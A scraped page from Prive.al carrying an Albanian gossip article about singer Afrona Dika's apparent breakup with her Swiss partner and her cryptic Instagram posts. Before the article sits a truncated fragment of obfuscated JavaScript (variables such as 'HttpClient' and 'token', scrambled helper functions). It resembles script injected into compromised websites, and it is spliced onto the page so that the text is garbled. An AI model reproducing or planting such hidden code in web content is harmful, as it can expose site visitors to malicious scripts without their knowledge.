;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Afrona Dika vjen me një mesazh kriptik pas ndarjes

By

Ditë më parë, Prive.al raportoi për ndarjen e Afronës nga partneri i saj zviceran, James Smith.

Kjo u kuptua nga rrjetet sociale dhe mungesa e tij në ditën më të veçantë të Afronës, atë të ditëlindjes së 31-të, javës që po lëmë pas.

Një postim i mëparshëm i saj mbase mund të ishte edhe fjala e saj indirekte mbi këtë zhvillim.

‘Është në rregull të jesh e frikësuar. Por duhet ta sfidosh veten, të hapesh, dashurosh, të bësh gabime, të mësosh, të bëhesh më e fortë. Dhe të fillosh sërish nga e para’, ishte shprehur ajo.

Ndërkaq një tjetër mesazh i koduar, që duket të ketë lidhje me zhvillimet e fundit në jetën e saj personale, erdhi nga Afrona në Instagram.

“Fati i secilit prej nesh është i shënuar”, shkroi ajo duke ndarë edhe një selfie. /Prive.al

Artikuj të ngjashëm